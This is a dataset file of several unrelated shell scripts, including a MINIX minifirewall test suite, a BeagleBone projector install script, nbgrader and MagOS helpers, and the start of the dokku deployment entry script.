# first param is "username=password" and the "=password" part is optional
# If the password is empty then we use the username for the password.
# Second param is a "chroot" directory containing the /etc/shadow file.
# (The actual separator used below is ":", matching USER_PW/ROOT_PW.)
set_password() {
    local user_pw=$1 dir=$2
    local user=${user_pw%%:*}
    local pw=${user_pw#*:}
    : ${pw:=$user}
    # Hash with SHA-512 crypt; requires the mkpasswd utility.
    local hash=$(mkpasswd -m sha-512 "$pw")
    pretend sed -i -r "s=^($user):[^:]*:=\1:$hash:=" $dir/etc/shadow
}
# Rewrite field 6 (home directory) of $1's passwd entry under $3/etc/passwd.
update_home() {
    local user=$1 home=$2 dir=$3
    pretend sed -i -r "s=^($user:[^:]*:[^:]*:[^:]*:[^:]*:)[^:]*=\1$home=" $dir/etc/passwd
}
# Persist the session state (roots plus the lists of files/dirs we created)
# as shell assignments, so read_conf_file can simply source them back.
write_conf_file() {
  local conf=$1
  mkdir -p "$(dirname "$conf")"
  {
    printf 'REAL_ROOT="%s"\n' "$REAL_ROOT"
    printf 'BIND_ROOT="%s"\n' "$BIND_ROOT"
    printf 'RM_DIRS="%s"\n'   "$RM_DIRS"
    printf 'RM_FILES="%s"\n'  "$RM_FILES"
  } > "$conf"
}
# Source a cleanup.conf written by write_conf_file. Returns 0 on success.
# If the file is unreadable: fatal error, unless $2 ("force") is non-empty,
# in which case return 1 and let the caller carry on.
read_conf_file() {
  local cfg=$1 allow_missing=$2
  if test -r "$cfg"; then
    . "$cfg"
    return 0
  fi
  [ -n "$allow_missing" ] || fatal "Could not find config file $cfg"
  return 1
}
# Replace a symlink with a private copy of its target (so the file can
# later be modified or bind mounted independently). Non-links and links
# that do not resolve to a regular file are left untouched.
make_real() {
  local link=$1
  test -L "$link" || return
  local resolved
  resolved=$(readlink -f "$link")
  test -f "$resolved" || return
  # Stage the copy next to the link, then atomically swap it into place.
  local staging
  staging=$(mktemp "$link.XXXXXXXX")
  cp "$resolved" "$staging"
  mv "$staging" "$link"
}
# 40 random bytes hashed down to a 32-character lowercase hex string.
random_hex_32() {
  dd if=/dev/urandom bs=1 count=40 2>/dev/null | md5sum | awk '{ print $1 }'
}

# A "==== <random-hex>" marker line used to tag linuxfs.ver records.
version_id() {
  printf '==== %s\n' "$(random_hex_32)"
}
# Print "<script> Fatal Error: <msg>" on stderr and exit with $2
# (default exit status 2).
fatal() {
  local message=$1
  local code=${2:-2}
  echo -e "$ME Fatal Error: $message" >&2
  exit "$code"
}

# Print "<script> Error: <msg>" on stderr; does not exit.
error() {
  echo -e "$ME Error: $1" >&2
}
# Succeed iff the canonicalized path $1 appears as a mount point
# (second field) in /proc/mounts.
is_mounted() {
  local target
  target=$(readlink -f "$1")
  awk '{ print $2 }' /proc/mounts | grep -q "^${target}$"
}
# Run a command, honoring --pretend / --verbose:
#   verbose: echo the command, then run it
#   pretend: echo the command and do NOT run it
pretend() {
  if [ -n "$PRETEND" ] || [ -n "$VERBOSE" ]; then
    echo "$@"
  fi
  if [ -n "$PRETEND" ]; then
    return 0
  fi
  "$@"
}
# Entry point: forward all command-line arguments to main().
main "$@"
| true
|
10f08a3a183c68d56820ce408151ae006265967a
|
Shell
|
magos-linux/magos-linux
|
/make_modules/add-modules/files/patches/rootfs/rootfs/usr/lib/magos/scripts/save2module
|
UTF-8
| 1,168
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/bash
# Control MagOS "save to module" mode via /etc/sysconfig/MagOS.
# Prefer the MagOS-Data modules directory when that module is loaded.
path=/mnt/livemedia/MagOS/modules
cat /mnt/live/etc/modules | grep -q MagOS-Data && path=/mnt/livemedia/MagOS-Data/modules
# Module extension follows the kernel's squashfs compression: xzm if XZ
# support is compiled in, lzm otherwise.
zcat /proc/config.gz | grep -q SQUASHFS_XZ && MODULEFORMAT=xzm || MODULEFORMAT=lzm
# Turn the mode on. Called as `ENABLE --enable [file]`, so $2 is the
# optional target module path; a timestamped default is generated otherwise.
ENABLE()
{
 sed -i '/^SAVETOMODULE.*/d' /etc/sysconfig/MagOS
 echo "SAVETOMODULE=yes" >> /etc/sysconfig/MagOS
 SAVETOMODULENAME="$2"
 [ "${2}_" == "_" ] && SAVETOMODULENAME="$path/zz-save-$(date +%F_%H-%M).$MODULEFORMAT"
 echo "SAVETOMODULENAME=$SAVETOMODULENAME" >> /etc/sysconfig/MagOS
}
# Turn the mode off by dropping all SAVETOMODULE* settings.
DISABLE()
{
 sed -i '/^SAVETOMODULE.*/d' /etc/sysconfig/MagOS
}
# Report "enabled|disabled <module-path>" based on the current settings.
STATUS()
{
 . /etc/sysconfig/MagOS
 status=disabled
 [ "$SAVETOMODULE" = "yes" ] && status=enabled
 [ "$SAVETOMODULENAME" = "" ] && SAVETOMODULENAME=/mnt/livemedia/MagOS/optional/zz-save.$MODULEFORMAT
 echo "$status $SAVETOMODULENAME"
}
HELP()
{
cat <<EOF
Script to control SAVETOMODULE mode
Usage:
 --enable </path/file.$MODULEFORMAT>
 --disable
 --status
 --help
EOF
}
# Default action, when no argument is given, is --status.
cmd=$1
[ "$cmd" = "" ] && cmd="--status"
case $cmd in
 -h | --help )
 HELP ;;
 --status )
 STATUS ;;
 # Note: all args are forwarded, so inside ENABLE $1 is "--enable"
 # and $2 is the optional module path.
 --enable )
 ENABLE $@ ;;
 --disable )
 DISABLE ;;
esac
exit 0
| true
|
c761b5c743e22e91040243935904c88f8130af05
|
Shell
|
jgwerner/morehouse-outreach-notebook
|
/illumidesk-notebook/enable_extensions.sh
|
UTF-8
| 1,114
| 2.953125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Enable the nbgrader Jupyter server/notebook extensions appropriate for
# the role in $USER_ROLE (set by the hosting environment).
# Both helpers use subshell bodies "( ... )" so their settings/side effects
# of shell state stay isolated; the jupyter commands still act globally.
install_instructor_extensions() (
    jupyter serverextension enable --sys-prefix nbgrader.server_extensions.assignment_list
    jupyter serverextension enable --sys-prefix nbgrader.server_extensions.course_list
    jupyter serverextension enable --sys-prefix async_nbgrader
    jupyter nbextension enable --sys-prefix course_list/main --section=tree
    jupyter nbextension enable --sys-prefix assignment_list/main --section=tree
    jupyter nbextension enable --sys-prefix --py async_nbgrader/common
)
# Students only get the assignment list (no course list / async grading).
install_student_extensions() (
    jupyter serverextension enable --sys-prefix nbgrader.server_extensions.assignment_list
    jupyter nbextension enable --sys-prefix assignment_list/main --section=tree
)
if [[ "${USER_ROLE}" == "Instructor" ]] || [[ "${USER_ROLE}" == "TeachingAssistant" ]]; then
    echo "Enabling nbgrader extensions for Instructor or TeachingAssistant role"
    install_instructor_extensions
fi
if [[ "${USER_ROLE}" == "Student" ]] || [[ "${USER_ROLE}" == "Learner" ]]; then
    echo "Enabling nbgrader extensions for Student/Learner role"
    install_student_extensions
fi
| true
|
4e31eaa97d659188932ba71aee1e44dcfe2f53ad
|
Shell
|
ArtemSharypov/4580-research-project
|
/firewallTestOut.sh
|
UTF-8
| 7,485
| 3.25
| 3
|
[] |
no_license
|
#!/bin/sh
# Run the minifirewall test suite
# Test print minifirewall
# NOTE(review): despite the /bin/sh shebang, the suite below relies on
# bash-only constructs (notably `&>>`); it behaves as intended only when
# /bin/sh is bash-compatible.
readonly TEST_PATH=/usr/src/minix/commands/minifirewall/testResults/testTerminalOutputOut.txt
readonly EXTRA_LOGS=/usr/src/minix/commands/minifirewall/testResults/extraLogs.txt
# Start with fresh result files. NOTE(review): plain `rm` prints an error
# on the very first run when the files do not yet exist (`rm -f` would not).
rm $TEST_PATH
rm $EXTRA_LOGS
###############################################################################################
# Append a pass/fail line to $TEST_PATH based on the exit status of the
# command that ran immediately before this function was called.
print_result() {
    # Capture $? on the very first line -- any other command would clobber
    # the status we are reporting on.
    _rc=$?
    # FIX: the original used `[ $? == 0 ]` (a bashism that breaks under the
    # script's /bin/sh shebang) and the bash-only `&>>` redirection; use the
    # POSIX-safe `-eq` test and explicit ">> file 2>&1" instead.
    if [ "$_rc" -eq 0 ]; then
        printf "Successful connection attempt, there was no block\n" >> "$TEST_PATH" 2>&1
    else
        printf "Failed to connect, likely due to a block...that darn firewall\n" >> "$TEST_PATH" 2>&1
    fi
}
###############################################################################################
echo "---------------------------------------------------------------------------"
printf "Testing traffic manipulation of outgoing packets\n" &>> $TEST_PATH
printf "\n\n" &>> $TEST_PATH
echo "Test minifirewall policy Blocks OUT" &>> $TEST_PATH
echo "----------------------------------" &>> $TEST_PATH
# Test #1
# Pattern used by every test: baseline connection attempt, add a firewall
# rule, retry (expected to be blocked), then delete rule 1.
printf "\nTest #1 TCP block outgoing \n" 2>&1 | tee -a $TEST_PATH
# Loopback TCP echo: a delayed sender pipes into a listener on port 80.
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 localhost 80) | nc -w 10 -l -p 80 &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --out --proto TCP --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --proto TCP --action BLOCK
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 localhost 80) | nc -w 10 -l -p 80 &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #2
printf "\nTest #2 UDP block outgoing \n" 2>&1 | tee -a $TEST_PATH
printf "\n Progress...................64/100\n"
(sleep 5; echo "Succesfully Recieved the message" | nc -u -w 1 localhost 80) | nc -w 10 -u -l -p 80 &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --out --proto UDP --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --proto UDP --action BLOCK
# FIX: redirection was "$>>", which passed a literal "$" argument to nc and
# appended only stdout; "&>>" (as used everywhere else) logs stderr too.
(sleep 5; echo "Succesfully Recieved the message" | nc -u -w 1 localhost 80) | nc -w 10 -u -l -p 80 &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #3
printf "\nTest #3 ICMP block outgoing \n" 2>&1 | tee -a $TEST_PATH
ping -c 1 localhost &>> $EXTRA_LOGS
print_result
# FIX: log line said "IDMP" while the actual rule (below) uses ICMP.
printf "\nminifirewall --out --proto ICMP --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --proto ICMP --action BLOCK
ping -c 1 localhost &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #4
printf "\nTest #4 Block ALL outgoing \n" 2>&1 | tee -a $TEST_PATH
ping -c 1 localhost &>> $EXTRA_LOGS
printf "\nminifirewall --out --proto ALL --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --proto ALL --action BLOCK
# With ALL blocked, each protocol (ICMP, UDP, TCP) is probed in turn.
ping -c 1 localhost &>> $EXTRA_LOGS
print_result
# FIX: second "$>>" typo, same correction as in Test #2.
(sleep 5; echo "Succesfully Recieved the message" | nc -u -w 1 localhost 80) | nc -w 10 -u -l -p 80 &>> $EXTRA_LOGS
print_result
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 localhost 80) | nc -w 10 -l -p 80 &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #5
# Block outgoing traffic whose *source* IP is 10.0.2.15; the second ping is
# expected to fail.  All output for this test goes to the main log.
printf "\nTest #5 Test blockage of outgoing source IP Address \n" 2>&1 | tee -a $TEST_PATH
printf "\n Progress...................77/100\n"
ping -c 1 10.0.2.15 &>> $TEST_PATH
printf "\nminifirewall --out --srcip 10.0.2.15 --proto ALL --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --srcip 10.0.2.15 --proto ALL --action BLOCK &>> $TEST_PATH
ping -c 1 10.0.2.15 &>> $TEST_PATH
# Rule cleanup so the next test starts from an empty rule table.
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #6
# Block outgoing TCP to a specific destination IP and port; the loopback
# exchange below should fail while the rule is installed.
printf "\nTest #6 Test blockage of outgoing destination IP Address \n" 2>&1 | tee -a $TEST_PATH
printf "\nminifirewall --out --destip 127.0.0.1 --proto TCP --destport 80 --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --destip 127.0.0.1 --proto TCP --destport 80 --action BLOCK &>> $TEST_PATH
printf "\nBlocked port: \n" &>> $TEST_PATH
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 127.0.0.1 80) | nc -w 10 -l -p 80 &>> $TEST_PATH
print_result
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #7
# Block outgoing TCP to destination port 80 only: traffic to port 80 should
# fail while traffic to port 90 still gets through.
printf "\nTest #7 Block outgoing packets if directed at specific port \n" 2>&1 | tee -a $TEST_PATH
printf "\n Progress...................84/100\n"
printf "\nminifirewall --out --srcip 10.0.2.15 --proto TCP --destport 80 --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --srcip 10.0.2.15 --proto TCP --destport 80 --action BLOCK &>> $TEST_PATH
printf "\nBlocked port: \n" &>> $TEST_PATH
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 127.0.0.1 80) | nc -w 10 -l -p 80 &>> $TEST_PATH
print_result
printf "Using alternative port we get: " &>> $TEST_PATH
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 127.0.0.1 90) | nc -w 10 -l -p 90 &>> $TEST_PATH
print_result
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #8
# Block by source IP with an explicit netmask; the broadcast ping should fail
# once the rule is active.
printf "\nTest #8 Test blockage of outgoing masked IP Address \n" 2>&1 | tee -a $TEST_PATH
printf "\n Progress...................88/100\n"
ping -c 1 255.255.255.255 &>> $TEST_PATH
printf "\nminifirewall --out --srcip 10.0.2.15 --srcnetmask 255.255.255.255 --proto ALL --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --srcip 10.0.2.15 --srcnetmask 255.255.255.255 --proto ALL --action BLOCK &>> $TEST_PATH
ping -c 1 255.255.255.255 &>> $TEST_PATH
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #9
# Verify that a later UNBLOCK rule overrides an earlier BLOCK rule: the TCP
# exchange fails after the BLOCK is installed and works again after UNBLOCK.
printf "\nTest #9 Test Unblock outgoing policy \n" 2>&1 | tee -a $TEST_PATH
printf "\n Progress...................95/100\n"
printf "\nminifirewall --out --proto TCP --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --proto TCP --action BLOCK &>> $TEST_PATH
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 127.0.0.1 80) | nc -w 10 -l -p 80 &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --out --proto TCP --action UNBLOCK\n" &>> $TEST_PATH
minifirewall --out --proto TCP --action UNBLOCK &>> $TEST_PATH
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 127.0.0.1 80) | nc -w 10 -l -p 80 &>> $EXTRA_LOGS
print_result
# Both rules must be removed; rule 2 is deleted first so rule 1 keeps its index.
printf "\nminifirewall --delete 2\n" &>> $TEST_PATH
minifirewall --delete 2 &>> $TEST_PATH
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Final progress report and pointer to the result files.
printf "\n Progress...................100/100\n"
printf "\n\n\n" &>> $TEST_PATH
printf "\n Output tests completed view in /testResults/testTerminalOutputOut.txt\n"
printf "\n All tests completed thank you for your patience! :)\n"
| true
|
1797fe070871366a39d9987f98503217faa6c2b5
|
Shell
|
dlp-keynote/LC4500_PEM
|
/pem_install.sh
|
UTF-8
| 4,047
| 3.6875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Last update: 11/30/2015
#
# This script is designed to be ran on the BB from the directory where the install files are located.
# This means that the user has already pulled a copy of the install files (including this script)
# onto the BB either through git or some other means.
#
# This script requires superuser priveleges (default) for some operations.
#
# It should be ran on a clean Debian build (Debian Image 2015-03-01 was used originally).
#
# When run, it will perform several "install" operations for the following components:
#  - Links will be created for the startup script using update-rc.d command in /etc/init.d/lc4500_startup.sh
#  - compile the cape manager overlays (DTS) into DTBO files and place them into the cape manager folder
#  - update apt-get and install various libraries required by the application

# Remember where the install files live; we cd around a lot below.
cur_dir=`pwd`

echo ========= Installing Startup Script and app ==========
echo "Updating Boot-up scripts...."
cd /etc/init.d
# Remove old startup scripts so we can rearrange their boot priorities.
sudo update-rc.d apache2 remove
sudo update-rc.d xrdp remove
# Copy new versions with new priorities.
cp "$cur_dir/StartupScripts/cron" .
cp "$cur_dir/StartupScripts/dbus" .
cp "$cur_dir/StartupScripts/rsync" .
cp "$cur_dir/StartupScripts/udhcpd" .
cp "$cur_dir/StartupScripts/lc4500-pem.sh" .
sudo update-rc.d lc4500-pem.sh start 10 1 2 3 4 5 . stop 0 0 6 .

echo ========= Installing Device Tree Overlays =============
echo "Updating Device Tree Overlay files...."
cd /lib/firmware
sudo cp "$cur_dir/BB-BONE-LC4500-00A0.dts" .
# Compile the device tree overlay (SPI, HDMI etc.).
dtc -O dtb -o BB-BONE-LC4500-00A0.dtbo -b 0 -@ BB-BONE-LC4500-00A0.dts

echo ============= Updating the Cape Manager ================
cd /etc/default
cp "$cur_dir/capemgr" .

echo ============= Check uEnv.txt boot parameters ================
echo "Updating uEnv.txt file. Previous version saved in /boot/uEnv.old.txt"
cd "$cur_dir"
cp /boot/uEnv.txt /boot/uEnv.old.txt
cp /boot/uEnv.txt ./uEnv.old
# Rewrite uEnv.txt: enable the text console, disable the HDMI capes, re-enable
# the eMMC cape and turn off console blanking.
if [ -s uEnv.old ]; then
  echo "Using saved uEnv file"
  cat uEnv.old | sed '/cmdline/s/quiet/quiet text/g' | sed '/BB-BONELT-HDMI,BB-BONELT-HDMIN/s/#cape_disable/cape_disable/g' | sed '/BB-BONE-EMMC-2G/s/cape_disable/#cape_disable/g' | awk '/uname/{print "optargs=\"consoleblank=0\""}1' > /boot/uEnv.txt
else
  # BUG FIX: this branch used to read /boot/uEnv.txt while redirecting output
  # to the same file, which truncates it before it is read.  Read from the
  # backup made above instead.
  cat /boot/uEnv.old.txt | sed '/cmdline/s/quiet/quiet text/g' | sed '/BB-BONELT-HDMI,BB-BONELT-HDMIN/s/#cape_disable/cape_disable/g' | sed '/BB-BONE-EMMC-2G/s/cape_disable/#cape_disable/g' | awk '/uname/{print "optargs=\"consoleblank=0\""}1' > /boot/uEnv.txt
fi

echo ============= Check Network config ================
#echo Check /etc/network/interfaces to be sure the IP address is correct for this board
echo Check /etc/hostname to be sure the network name is correct:
echo "Type the new network hostname you want to use [you have 30 seconds or default will be automatically used]:"
# BUG FIX: a timed-out "read" leaves the variable empty, so pre-loading the
# default was pointless; apply the default after the read when nothing was
# entered.  The original test '[ $newhostname == ""]' was also malformed
# (missing space before the closing bracket and unquoted expansion).
newhostname=""
read -t 30 -r newhostname
if [ -z "$newhostname" ] ; then
  echo "Default network ID used: lc4500-pem. Be careful if you have multiple units on your network!"
  # BUG FIX: 'sudo echo x > file' performs the redirection as the
  # *unprivileged* shell; pipe through 'sudo tee' so root writes the file.
  echo "lc4500-pem" | sudo tee /etc/hostname > /dev/null
else
  echo "OK, changing network ID to:" "$newhostname"
  echo "$newhostname" | sudo tee /etc/hostname > /dev/null
fi

echo "Updating Debian libraries..."
sudo apt-get update
sudo apt-get install libdrm2
sudo apt-get install libudev-dev
sudo apt-get install libdrm-dev

echo "Building PEM application..."
cd "$cur_dir"
# Need to add xf86drm.h and other headers to system path to build locally
cp headers/*.h /usr/include
# Build application
cd objs
make
# BUG FIX: the init script is named lc4500-pem.sh (the check used a misspelled
# lc45000-pem.sh, so a running service was never stopped before the copy).
if [ -s /etc/init.d/lc4500-pem.sh ] ; then
  echo "Stopping existing PEM application..."
  sudo service lc4500-pem.sh stop
  echo "done. Copying new build"
fi
sudo cp lc4500_main /usr/bin
if [ -d /opt/lc4500pem ] ; then
  echo "Solution directory exists"
else
  sudo mkdir /opt/lc4500pem
fi
if [ -s /usr/bin/lc4500_main ] ; then
  echo "Installation Successful. Rebooting ..."
  reboot
else
  echo "Installation script failed!"
fi
| true
|
1df51904a6ee1a5783c82f3099ba05a3eefc2b21
|
Shell
|
clownix/cloonix
|
/quickstart/depends_install/depend_all.sh
|
UTF-8
| 257
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
# Run every per-distro dependency-install script in sequence, stopping at the
# first failure (set -e).
# BUG FIX: the shebang was "#/bin/bash" (missing '!'), so the line was a plain
# comment and the script ran under whatever shell invoked it.
set -e
LIST="lunar \
      jammy \
      bookworm \
      bullseye \
      fedora38 \
      fedora37 \
      centos9 \
      centos8 \
      tumbleweed"
for i in ${LIST}; do
  echo BEGIN ${i}
  ./${i}
  echo END ${i}
  # Brief pause between distro builds.
  sleep 5
done
| true
|
7b5550710a560e013bf77154aded2bca097c7879
|
Shell
|
GraduationProject5/pai-algorithm-server
|
/pipenv_run.sh
|
UTF-8
| 411
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
# Start the algorithm server, give it time to come up, then start the Celery
# worker.
# BUG FIX: the shebang was "#/bin/sh" (missing '!'), and the function below
# uses the bash-only 'local' builtin, so run under bash explicitly.

# Sleep for $1 seconds, then report completion on stdout.
sleepForAWhile(){
    local timeNum=$1
    sleep ${timeNum} &
    wait
    echo "SleepForAWhile is end.timeNum:${timeNum}"
}

# Algorithm server, port 14000
nohup pipenv run python manage.py runserver 0.0.0.0:14000 > server.log 2>&1 &
# Wait 12s so the algorithm server is fully started before Celery connects.
# BUG FIX: this call used to be backgrounded with '&', which launched the
# Celery worker immediately and made the wait a no-op.
sleepForAWhile 12
# Celery worker (multi-process)
nohup pipenv run celery -A pai_algorithm worker -l info > celery.log 2>&1 &
| true
|
5d1ed5a099dd429b5a0042cd34ed8d2ebc1963ce
|
Shell
|
abhishekkr/dotfiles
|
/shell_profile/a.rtlsdr.sh
|
UTF-8
| 637
| 3.0625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
### quick utils for DVB-T + DAB + FM

### Play FM Radio of provided frequency (in MHz, e.g. "rdo-fm-play 91.1")
rdo-fm-play(){
  # BUG FIX: the usage message referred to a non-existent "radio_fm" command.
  if [ $# -ne 1 ]; then echo "Usage: rdo-fm-play <FREQ>" && return 1; fi
  local _FREQ=$1
  # Demodulate wideband FM with rtl_fm and pipe raw 16-bit mono PCM to sox.
  rtl_fm -M wbfm -f ${_FREQ}M | play -r 32k -t raw -e signed-integer -b 16 -c 1 -V1 -
}

## Print the frequencies of Mumbai FM stations, one per line.
fm-mumbai(){
  # BUG FIX: these used to be single-element arrays holding one long string
  # and relied on accidental word-splitting; use real array elements.
  local _Frequencies=(91.1 92.7 93.5 94.3 98.3 100.7 104.0 104.8 107.1)
  # Station names, index-aligned with _Frequencies (kept for reference;
  # currently not printed, matching the original behavior).
  local _Station_Names=(Radio-City BIG-FM Red-FM Radio-One Radio-Mirchi AIR-FM-Gold Fever Oye-FM AIR-FM-Rainbow)
  local _FREQ
  for _FREQ in "${_Frequencies[@]}"; do
    echo "$_FREQ"
  done
}
| true
|
549b3db5ea042c855e43639138a710826bded723
|
Shell
|
gergap/tmux-imap
|
/scripts/mail_icon.sh
|
UTF-8
| 472
| 3.4375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# tmux status-line helper: render a mail icon for the IMAP message count
# cached in ~/imap-status.txt.

# Icons shown in the status line.
new_mail_icon="✉ "
no_mail_icon="-"

# Render the icon for a given count: plain for "0", red for "N/A" (count
# unavailable), green for anything else.  Output goes to stdout with tmux
# color directives.
print_icon() {
  local count=$1
  case "$count" in
    0)   printf '%s' "$new_mail_icon($count) " ;;
    N/A) printf '%s' "#[fg=red]$new_mail_icon($count) #[default]" ;;
    *)   printf '%s' "#[fg=green]$new_mail_icon($count) #[default]" ;;
  esac
}

main() {
  local status
  # Fall back to "N/A" when the status file is missing or unreadable.
  status=$(cat ~/imap-status.txt) || status="N/A"
  print_icon "$status"
}

main
| true
|
b945a30d649d6d1dd069e01e12b6fd6a59f23093
|
Shell
|
broadly/dokku
|
/dokku
|
UTF-8
| 5,715
| 3.625
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# dokku entry point: sets up the environment, normalizes how it was invoked
# (sudo re-exec, SSH forced command), then dispatches to the command handlers.
set -eo pipefail
shopt -s nullglob
# Defaults, overridable via the environment or the dokkurc files sourced below.
export DOKKU_DISTRO=${DOKKU_DISTRO:="ubuntu"}
export DOKKU_IMAGE=${DOKKU_IMAGE:="progrium/buildstep"}
export DOKKU_ROOT=${DOKKU_ROOT:=~dokku}
export PLUGIN_PATH=${PLUGIN_PATH:="/var/lib/dokku/plugins"}
# Exit-code protocol for plugin command scripts: 10 means "not my command".
export DOKKU_NOT_IMPLEMENTED_EXIT=10
export DOKKU_VALID_EXIT=0
source "$PLUGIN_PATH/common/functions"
[[ -f $DOKKU_ROOT/dokkurc ]] && source $DOKKU_ROOT/dokkurc
[[ -d $DOKKU_ROOT/.dokkurc ]] && for f in $DOKKU_ROOT/.dokkurc/*; do source $f; done
[[ $DOKKU_TRACE ]] && set -x
# parse_args (from common/functions) handles global --flags; then strip any
# leading --options from the positional parameters so $1 is the command name.
parse_args "$@"
args=("$@")
if [[ "${args[0]}" =~ ^--.* ]]; then
for arg in "$@"; do
if [[ "$arg" =~ ^--.* ]];then
shift 1
else
break
fi
done
fi
# Suppress decorative output when stdout is not a terminal.
! has_tty && DOKKU_QUIET_OUTPUT=1
# Re-exec as the dokku user for everything except the plugin install/update
# commands, which need the caller's (root's) privileges.
if [[ $(id -un) != "dokku" && $1 != plugins-install* && $1 != "plugins-update" ]]; then
sudo -u dokku -E -H $0 "$@"
exit
fi
# When invoked as an SSH forced command, re-run ourselves with the original
# command line (config-* values go through xargs to get word-split safely).
if [[ -n "$SSH_ORIGINAL_COMMAND" ]]; then
export -n SSH_ORIGINAL_COMMAND
if [[ $1 =~ config-* ]];then
xargs $0 <<<$SSH_ORIGINAL_COMMAND
exit $?
else
$0 $SSH_ORIGINAL_COMMAND
exit $?
fi
fi
case "$1" in
receive)
APP="$2"; IMAGE="dokku/$APP"; IMAGE_SOURCE_TYPE="$3"; TMP_WORK_DIR="$4"
dokku_log_info1 "Cleaning up..."
dokku cleanup
dokku_log_info1 "Building $APP from $IMAGE_SOURCE_TYPE..."
dokku build "$APP" "$IMAGE_SOURCE_TYPE" "$TMP_WORK_DIR"
dokku_log_info1 "Releasing $APP..."
dokku release "$APP" "$IMAGE_SOURCE_TYPE"
dokku_log_info1 "Deploying $APP..."
dokku deploy "$APP"
dokku_log_info2 "Application deployed:"
dokku urls "$APP" | sed "s/^/ /"
echo
;;
deploy)
APP="$2"; IMAGE="dokku/$APP"
pluginhook pre-deploy $APP
if [[ -f "$DOKKU_ROOT/$APP/CONTAINER" ]]; then
oldid=$(< "$DOKKU_ROOT/$APP/CONTAINER")
fi
# start the app
DOCKER_ARGS=$(: | pluginhook docker-args $APP deploy)
DOCKER_ARGS+=$(: | pluginhook docker-args-deploy $APP)
BIND_EXTERNAL=$(pluginhook bind-external-ip $APP)
is_image_buildstep_based "$IMAGE" && DOKKU_BUILDSTEP=true
[[ -n "$DOKKU_BUILDSTEP" ]] && START_CMD="/start web"
[[ -z "$DOKKU_BUILDSTEP" ]] && eval "$(grep DOKKU_DOCKERFILE_PORT $DOKKU_ROOT/$APP/ENV)"
if [[ "$BIND_EXTERNAL" = "false" ]];then
port=${DOKKU_DOCKERFILE_PORT:=5000}
id=$(docker run -d -e PORT=$port $DOCKER_ARGS $IMAGE $START_CMD)
ipaddr=$(docker inspect --format '{{ .NetworkSettings.IPAddress }}' $id)
else
id=$(docker run -d -p 5000 -e PORT=5000 $DOCKER_ARGS $IMAGE $START_CMD)
port=$(docker port $id 5000 | sed 's/[0-9.]*://')
ipaddr=127.0.0.1
fi
# if we can't post-deploy successfully, kill new container
kill_new() {
docker inspect $id &> /dev/null && docker kill $id > /dev/null
trap - INT TERM EXIT
kill -9 $$
}
# run checks first, then post-deploy hooks, which switches Nginx traffic
if [[ -z "$DOKKU_SKIP_CHECKS" ]] ; then
trap kill_new INT TERM EXIT
dokku_log_info1 "Running pre-flight checks"
pluginhook check-deploy $APP $port $ipaddr $id
trap - INT TERM EXIT
fi
# now using the new container
echo $id > "$DOKKU_ROOT/$APP/CONTAINER"
echo $ipaddr > "$DOKKU_ROOT/$APP/IP"
echo $port > "$DOKKU_ROOT/$APP/PORT"
echo "http://$(< "$DOKKU_ROOT/HOSTNAME"):$port" > "$DOKKU_ROOT/$APP/URL"
dokku_log_info1 "Running post-deploy"
pluginhook post-deploy $APP $port $ipaddr
# kill the old container
if [[ -n "$oldid" ]]; then
# Let the old container finish processing requests, before terminating it
WAIT="${DOKKU_WAIT_TO_RETIRE:-60}"
dokku_log_info1 "Shutting down old container in $WAIT seconds"
(
exec >/dev/null 2>/dev/null </dev/null
trap '' INT HUP
sleep $WAIT
docker kill $oldid
) & disown -a
# Use trap since disown/nohup don't seem to keep child alive
# Give child process just enough time to set the traps
sleep 0.1
fi
;;
cleanup)
# delete all non-running container
# shellcheck disable=SC2046
docker rm $(docker ps -a -f 'status=exited' -q) &> /dev/null &
# delete unused images
# shellcheck disable=SC2046
docker rmi $(docker images -f 'dangling=true' -q) &> /dev/null &
;;
plugins)
